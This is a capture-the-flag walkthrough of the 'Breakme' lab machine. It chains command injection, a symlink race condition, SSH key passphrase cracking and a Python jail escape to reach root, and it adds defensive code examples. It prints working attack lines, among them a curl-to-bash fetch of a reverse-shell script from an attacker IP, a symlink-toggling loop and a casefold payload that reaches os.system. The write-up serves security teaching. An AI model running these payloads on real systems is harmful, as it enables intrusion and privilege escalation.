When enumerating as www-data, we find an internal service on port 9999. It is bound to 127.0.0.1 only, which is why the nmap scan did not show it.

www-data@Breakme:/home/john$ netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address    Foreign Address   State   PID/Program name    
tcp        0      0 127.0.0.1:3306   0.0.0.0:*         LISTEN      -
tcp        0      0 127.0.0.1:9999   0.0.0.0:*         LISTEN      -
tcp        0      0 0.0.0.0:22       0.0.0.0:*         LISTEN      -
tcp6       0      0 :::80            :::*              LISTEN      -
tcp6       0      0 :::22            :::*              LISTEN      -
udp        0      0 0.0.0.0:68       0.0.0.0:*                     -   

This looks like another web application, possibly the way to user john.

www-data@Breakme:/tmp$ curl 127.0.0.1:9999
<html>
<head>
        <title>Test</title>
        <style>
                .checkTarget{
                        position:absolute;
                        width:calc(30%);
                        height:450px;
                        top:calc(10%);
                        left:calc(2.5%);
                        border:3px solid green;
                        border-radius:5%;
                        background-color:rgb(180,220,180);
                        text-align:center;
                }
                .checkUser{
                        position:absolute;
                        width:calc(30%);
                        height:450px;
                        top:calc(10%);
                        left:calc(35%);
                        border:3px solid green;
                        border-radius:5%;
                        background-color:rgb(180,220,180);
                        text-align:center;
                }
                .checkFile{
                        position:absolute;
                        width:calc(30%);
                        height:450px;
                        top:calc(10%);
                        left:calc(67.5%);
                        border:3px solid green;
                        border-radius:5%;
                        background-color:rgb(180,220,180);
                        text-align:center;
                }
                body{
                        background-color:rgb(200,200,200);
                }
                pre{
                        white-space:pre-wrap;
                        word-wrap:break-word;
                        overflow:auto;
                        width:calc(100%);
                        height:180px;
                        text-align:center;
                }
                .output{
                        width:calc(100%);
                        text-align:center;
                }
        </style>
</head>
<body>
        



        <h1 style="color:rgb(50,100,50);">My Tools:</h1>
        <!--Only numerical IPs allowed -->
        <div class="container">
        <form class="checkTarget" method="POST">
                <h3>Check Target:</h3>
                <input name="cmd1" style="border-radius:5%;border:3px solid green;height:30px" type="text" placeholder="Target IP" /><br><br>
                <input style="width:70px" type="submit" value="Run" /><br><br><br>
                <h3>Result:</h3><br>
                <div class="output"><pre></pre></div>
        </form>
        <form class="checkUser" method="POST">
                <h3>Check User:</h3>
                <input name="cmd2" style="border-radius:5%;border:3px solid green;height:30px" type="text" placeholder="User name" /><br><br>
                <input style="width:70px" type="submit" value="Run" /><br><br><br>
                <h3>Result:</h3><br>
                <div class="output"><pre></pre></div>
        </form>
        <form class="checkFile" method="POST">
                <h3>Check File:</h3>
                <input name="cmd3" style="border-radius:5%;border:3px solid green;height:30px" type="text" placeholder="File name" /><br><br>
                <input style="width:70px" type="submit" value="Run" /><br><br><br>
                <h3>Result:</h3>
                <div class="output"><pre></pre></div>
        </form>
        </div>
</body>
</html>

Before we continue, we look at the background processes with pspy. The service on port 9999 is a web server running in the context of UID 1002.

That is our user john.

To reach the service comfortably from our attack machine, we tunnel it with Ligolo-ng.

Setup Ligolo-ng

First, we set up a TUN interface named ligolo and add a route so that traffic for 240.0.0.1 goes through the tunnel. Ligolo-ng maps this address to the agent's loopback interface, so it is how we will reach 127.0.0.1:9999 on the target.

┌──(kali㉿kali)-[~]
└─$ sudo ip tuntap add user 0xb0b mode tun ligolo
[sudo] password for kali: 
                        
┌──(kali㉿kali)-[~]
└─$ sudo ip link set ligolo up

┌──(kali㉿kali)-[~]
└─$ sudo ip route add 240.0.0.1 dev ligolo

Next, we download the latest release of ligolo-ng; we need the amd64 builds of both the proxy and the agent.

On our attack machine, we start the proxy server.

./proxy -selfcert

Next on the target machine we start the agent to connect to our proxy.

./agent -connect 10.8.211.1:11601 --ignore-cert

The ligolo-ng proxy reports that an agent has joined. We select it with the session command and then run start to bring the tunnel up.

We are now able to reach internal port 9999 via the address 240.0.0.1.

The page offers three tools: Check Target, Check User and Check File. Each takes input and displays a result, which suggests that the input ends up in a shell command and that command injection may be possible.

If we enter our IP in Check Target, a ping is actually executed. This input only accepts the numerical representation of IP addresses.

Check User reflects what we enter, but we cannot find a valid user, not even the known john, bob or www-data.

Check File does not find any files either, and special characters and numbers do not seem to be permitted there.

We enter a set of special characters in Check User and see that only a small subset is reflected; the rest are removed. The space character is removed as well.

!@#$%^&*()_+-={}[]|:;'"<>,.?/

With the special characters that survive the filter, we can try the following command injection. ${IFS} (the shell's internal field separator, which expands to whitespace) stands in for the space, and the leading pipe makes the application's own command feed into ours:

|ping${IFS}10.17.15.155

We capture the ICMP packets with tcpdump on our machine and confirm that the injection works.

Next, we prepare a simple reverse shell script as payload.sh. Since & is not available to us, we fetch the script with curl and execute it within the same pipeline.

We set up a Python web server to serve the payload.

We replace the ping with a curl request to check that the target can fetch the payload:

|curl${IFS}http://10.17.15.155/payload.sh

Now we start a listener on port 4446 and pipe the downloaded script into bash:

|curl${IFS}http://10.17.15.155/payload.sh|bash

The shell connects back as john, and we can read the first flag in his home directory.
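The injection above works because the Check User handler sanitises with a blocklist (drop spaces, drop most specials) and then concatenates what is left into a shell command line. The following is an added example, not the box's source, that models that handler beside one that never hands user input to a shell. The exact command the target runs is unknown; running id with the supplied name through sh is an assumption, as is the set of special characters that survive the filter (chosen so that the page's own payloads get through).

```python
"""Added example (not the target's source): a space-stripping blocklist beside the
${IFS} injection that defeats it, and handlers that validate instead of filtering.
Assumptions: the handler runs `id <name>` via sh; ALLOWED_SPECIALS is a guess."""
import ipaddress
import re
import subprocess

# Characters assumed to survive the target's filter; the page only shows that a
# "small set" is reflected and that its payloads need | $ { } : / . to work.
ALLOWED_SPECIALS = set("|${}:/._-")


def sanitize(user_input: str) -> str:
    """Reproduce the observed filter: spaces and most specials dropped, a few kept."""
    return "".join(c for c in user_input if c.isalnum() or c in ALLOWED_SPECIALS)


def vulnerable_check_user(name: str) -> str:
    """Blocklist sanitising, then string concatenation into a shell command line.
    `|echo${IFS}injected` survives sanitising; sh expands ${IFS} to whitespace,
    so the line becomes `id | echo injected` and our command runs."""
    cmd = "id " + sanitize(name)
    proc = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
    return proc.stdout


# Allowlist for a Unix user name: no metacharacters can ever pass this.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def safe_check_user(name: str) -> str:
    """Validate against an allowlist, then pass the value as its own argv element.
    No shell is involved, so there is nothing for a pipe or ${IFS} to act on."""
    if not USERNAME_RE.match(name):
        raise ValueError("invalid user name")
    proc = subprocess.run(["id", name], capture_output=True, text=True)
    return proc.stdout


def safe_check_target(target: str) -> list:
    """Parse the target as an IP address instead of filtering characters; returns
    the argv list that would be executed without a shell."""
    addr = ipaddress.ip_address(target)  # ValueError on anything that is not an IP
    return ["ping", "-c", "1", str(addr)]


if __name__ == "__main__":
    injected = "|echo${IFS}injected"
    print(repr(vulnerable_check_user(injected)))   # 'injected\n'
    try:
        safe_check_user(injected)
    except ValueError as exc:
        print("safe handler rejected the input:", exc)
    print(safe_check_target("10.17.15.155"))
```

The point of the contrast is that the fix is not a longer blocklist: the moment input is concatenated into a line that a shell parses, every expansion and operator the shell knows is in scope, and ${IFS} is only one of them. Parsing the value into the type you expect (an IP address, a user name matching a strict pattern) and passing it as an argv element removes the shell from the picture entirely.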

Reverse Shell as Youcef

In youcef's home directory we find files we are allowed to access, including a binary called readfile.

To inspect them on our attack machine, we serve the directory with a Python web server and download them.

We have to decompile the readfile binary, because the source, readfile.c, is not readable to us. The binary has the SUID bit set and is owned by youcef, so it reads files with youcef's privileges; our goal is youcef's SSH key. Simply asking for it does not work: reading the key results in a "file not found" error, and asking for readfile.c answers with Nice Try!, so restrictions are clearly in place.

The decompiled code shows what those restrictions are. The program first checks that an argument was supplied, otherwise it exits with a usage message. It then checks that the file exists and that the caller runs as UID 1002 (john). If the filename contains flag or id_rsa, or the path is a symlink, access is denied with Nice Try!. A file that passes all checks is not opened immediately: the program calls usleep() first and only then opens and prints it. The checks and the open are two separate operations on the same path name, separated by a deliberate delay, which gives us a time-of-check to time-of-use (TOCTOU) race condition.

Race Condition

To exploit the race, we create a file that we rapidly toggle between a regular file and a symlink to the file we really want, youcef's SSH key. If the check sees the regular file, it passes; if by the time the program opens the path it has become the symlink, the open follows it and prints the key. The filename filter never sees the string id_rsa, because it only looks at the argument we supply.

First we run a loop in the background that keeps switching the file between the two states:

while true; do ln -sf /home/youcef/.ssh/id_rsa symlink; rm symlink; touch symlink; done &

Then we run the program in a loop and hope to win the race. If the window is hit, the key is printed; if 30 attempts are not enough, simply increase the count.

for i in {1..30}; do /home/youcef/readfile symlink; done

After a few attempts we win the race and read /home/youcef/.ssh/id_rsa.

SSH Connection

Now that we have the SSH key, we hit another obstacle: the key is protected by a passphrase, so we have to crack it before we can log in.

┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm
Enter passphrase for key 'id_rsa':

We can try to brute-force the passphrase offline. First we convert the private key into a hash format that John the Ripper understands, using ssh2john:

$ ssh2john id_rsa > ssh_key.hash

Then we run john against the hash with the rockyou wordlist and obtain the passphrase.

┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ john ssh_key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 0.00% (ETA: 2024-10-10 21:56) 0g/s 53.50p/s 53.50c/s 53.50C/s cancer..michael1
[REDACTED]          (id_rsa)     
1g 0:00:00:12 DONE (2024-10-07 16:28) 0.07782g/s 52.29p/s 52.29c/s 52.29C/s gracie..kelly
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

With the key and the recovered passphrase we log in as youcef.

┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm
Enter passphrase for key 'id_rsa': 
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 21 07:55:16 2024 from 192.168.56.1
youcef@Breakme:~$ id
uid=1000(youcef) gid=1000(youcef) groups=1000(youcef)

This gives us our 2nd flag.

Privilege Escalation

youcef@Breakme:~$ sudo -l
Matching Defaults entries for youcef on breakme:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User youcef may run the following commands on breakme:
    (root) NOPASSWD: /usr/bin/python3 /root/jail.py

Executing the program reveals that we are operating within a Python jail, which prompts us for input.

youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> 

Testing the input, we find that entering something that is not valid Python triggers a "Wrong Input" message.

youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> test
Wrong Input
>> 

When we enter valid Python, it executes, so our input is apparently passed straight to exec (or eval).

youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> test
Wrong Input
>> print(hello)
Wrong Input
>> print('hello')
hello
>> 

However, if we try to import a module to run commands, we see the message Illegal Input and the program exits. This indicates that there must be some filtering in place.

>> import os
Illegal Input
youcef@Breakme:~$ 

Since the obvious route of importing os is blocked, and so is directly spawning a shell, we need to find out exactly what the filter matches and assemble the same call from pieces it does not recognise.

A common Python jail bypass payload imports the os module through the builtins and calls its system function:

  • __builtins__.__import__("os").system("ls")

But, if we try it in our case, we see that it fails.

>> __builtins__.__import__("os").system("ls")
Illegal Input

We first try the import function on its own via __builtins__.__import__, which is also rejected.

>> __builtins__.__import__
Illegal Input

Breaking the payload down and testing its components one by one, we find that the problem lies with the __import__ name and the double quotation mark, while __builtins__ on its own is accepted:

>> __builtins__
>> __import__
Illegal Input
>> "
Illegal Input

To avoid the double quotation mark, we use single quotes (') instead, which are accepted.

For __import__, instead of accessing it as the attribute __builtins__.__import__, we look it up in the builtins dictionary with __builtins__.__dict__['__import__']. The name is now a string, and a string we can assemble at run time with methods the filter does not see. The filter appears to be a case-sensitive substring match: __IMPORT__ in capitals is accepted (it only produces the generic Wrong Input, not Illegal Input):

>> __IMPORT__
Wrong Input

We can utilize __IMPORT__ and then apply a method to convert it to __import__. One method we can use is lower(), which transforms all uppercase letters into lowercase.

>> __builtins__.__dict__['__IMPORT__'.lower()]
Illegal Input

Testing the parts of our input once more, we find that lower is also not allowed.

>> __builtins__
>> __dict__
Wrong Input
>> []
>> ()
>> '
Wrong Input
>> __IMPORT__
Wrong Input
>> lower
Illegal Input

Looking for an alternative to lower, we find casefold, which also converts a string to lowercase (it is meant for case-insensitive comparison). This method is not filtered and works:

>> print(__builtins__.__dict__['__IMPORT__'.casefold()])
<built-in function __import__>

Returning to our payload, we find that when we attempt to import the os module, it is also not allowed, and we can see the reason why: os is filtered as well.

>> __builtins__.__dict__['__IMPORT__'.casefold()]('os')
Illegal Input
>> os
Illegal Input

Since os is supplied as a string as well, and OS is not filtered, we apply casefold once more.

As we can see, this works, and we are able to access the os module

>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()))
<module 'os' from '/usr/lib/python3.9/os.py'>

However, if we try to access the system function, we find that we fail once more.

>> __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).system
Illegal Input

This time, itโ€™s because system is filtered.

>> system
Illegal Input

Now, we can use __dict__ once more to be able to use system as a string and apply the casefold method to bypass the filter.

As we can see, this allows us to access the system function successfully.

>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()])
<built-in function system>

The remaining question is what to pass to system(). As noted above, the jail also blocks the direct ways of spawning a shell, but an interpreter that is installed on the box and not on the blocklist works just as well: with the payload __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick') we start the Yorick interpreter. From its prompt, system, "bash" launches a shell, and because jail.py runs under sudo as root, so does bash. That lets us read the third flag.

youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail
  Will you stay locked forever
  Or will you BreakMe
>> __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick')

 Copyright (c) 2005.  The Regents of the University of California.
 All rights reserved.  Yorick 2.2.04 ready.  For help type 'help'
> system, "bash"
root@Breakme:/home/youcef# cd ~
root@Breakme:~# id
uid=0(root) gid=0(root) groups=0(root)

We get our root flag.
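The jail falls because it filters the text of the input, not what the input does. The following added example (not /root/jail.py, whose source we never saw) models the blocklist as the probing above suggests it behaves, builds the same casefold payload, resolves it with the real builtins to show it lands on os.system without running anything, and then applies a syntax-based allowlist that rejects it. The BLOCKLIST tuple is an assumption reconstructed from the Illegal Input responses on this page.

```python
"""Added example (not /root/jail.py): a substring blocklist as observed on the box,
the casefold payload that walks through it, and an AST allowlist that stops it.
BLOCKLIST is assumed from the jail's Illegal Input replies; the real list is unknown."""
import ast
import builtins

BLOCKLIST = ("import", "os", "system", "lower", '"')


def blocklist_filter(payload: str) -> bool:
    """Case-sensitive substring match, as the jail appears to do. True = accepted."""
    return not any(token in payload for token in BLOCKLIST)


def build_payload(command: str) -> str:
    """Reach os.system(command) with every blocked word written in upper case inside
    a string literal and folded to lower case at run time, after the filter has looked."""
    if "'" in command:
        raise ValueError("command must not contain a single quote")
    importer = "__builtins__.__dict__['__IMPORT__'.casefold()]"
    module = importer + "('OS'.casefold())"
    return module + ".__dict__['SYSTEM'.casefold()]('" + command + "')"


def resolve(payload: str):
    """Evaluate the payload the way the jail does (with the real builtins module
    visible as __builtins__), but strip the final call so no command is executed.
    Returns the callable the payload reaches."""
    expression = payload.rsplit("(", 1)[0]
    return eval(expression, {"__builtins__": builtins})


def ast_allowlist(payload: str) -> bool:
    """Decide on syntax rather than spelling: no attribute access, no subscripts,
    no dunder names, no import statements. This defeats the casefold trick because
    the dangerous shape of the expression is still there whatever the string says.
    It is a stronger filter, not a sandbox: running untrusted Python as root stays unsafe."""
    try:
        tree = ast.parse(payload)
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if isinstance(node, (ast.Attribute, ast.Subscript, ast.Import, ast.ImportFrom)):
            return False
        if isinstance(node, ast.Name) and node.id.startswith("__"):
            return False
    return True


if __name__ == "__main__":
    payload = build_payload("id")
    print(payload)
    print("blocklist accepts it:", blocklist_filter(payload))       # True
    print("it resolves to:", resolve(payload))                       # <built-in function system>
    print("AST allowlist accepts it:", ast_allowlist(payload))       # False
    print("AST allowlist accepts print('hello'):", ast_allowlist("print('hello')"))  # True
```

The blocklist and the payload are both string operations, which is exactly why the game is unwinnable for the filter: any word it looks for can be produced by code that does not contain it. Deciding on the parsed structure removes that degree of freedom, but even an allowlist of AST nodes is not a security boundary, and the real fix for this sudo rule is to not let a user feed arbitrary Python to a root process at all.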
